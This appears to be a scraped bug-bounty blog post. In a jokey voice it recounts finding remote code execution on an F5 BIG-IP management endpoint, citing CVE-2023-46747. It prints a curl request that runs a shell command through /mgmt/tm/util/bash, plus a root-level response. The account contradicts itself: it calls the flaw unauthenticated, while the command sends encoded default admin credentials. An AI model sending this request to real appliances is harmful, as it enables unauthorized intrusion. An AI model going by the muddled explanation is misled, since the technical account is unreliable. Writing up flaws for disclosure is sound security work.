.png)
2 days ago
9 BOOK THIS SPACE FOR AD
ARTICLE AD
Free Link🎈
Hi there!🙌
Some people wake up and choose coffee, others choose chaos. I apparently chose both. One fine morning, instead of scrolling endlessly through memes, I decided to play detective on the internet. And guess what? I stumbled upon something juicier than my favorite street-side samosa — a Remote Code Execution (RCE) vulnerability!
Let me spill the beans on how that went down.
It was one of those days when even my phone notifications were silent. With no drama left in my life, I thought, why not create some myself? Bug bounty time! 🛡️
Scrolling through programs, I decided to test a well-known enterprise app. The world loves a good challenge, and I love poking into servers that occasionally fight back. After some recon (because real hackers always do recon, duh), I started finding juicy endpoints.
Here’s my simple game plan:
Subfinder and Amass for subdomain enumerationNuclei for vulnerability detectionBurp Suite to sniff out the sweet stuffWappalyzer to confirm what I’m dealing withWhile casually sipping on my chai, I hit an endpoint: /mgmt/tm/util/bash. At first glance, it seemed like a boring admin panel. But the detective in me said, "Something's fishy!"
I remembered a CVE (CVE-2023–46747) about F5 BIG-IP unauthenticated RCE. This vulnerability allows attackers to execute system commands without credentials. Spicy, right?
With a grin, I ran my Nuclei scanner and within seconds — BOOM! I had command execution.
curl -k -X POST <https://target.com/mgmt/tm/util/bash> \\-H "Authorization: Basic YWRtaW46YWRtaW4=" \\
-d '{"command":"run","utilCmdArgs":"-c id"}'
Response:
{"commandResult": "uid=0(root) gid=0(root)"
}
Bengali (Bangladesh) · 
English (United States) ·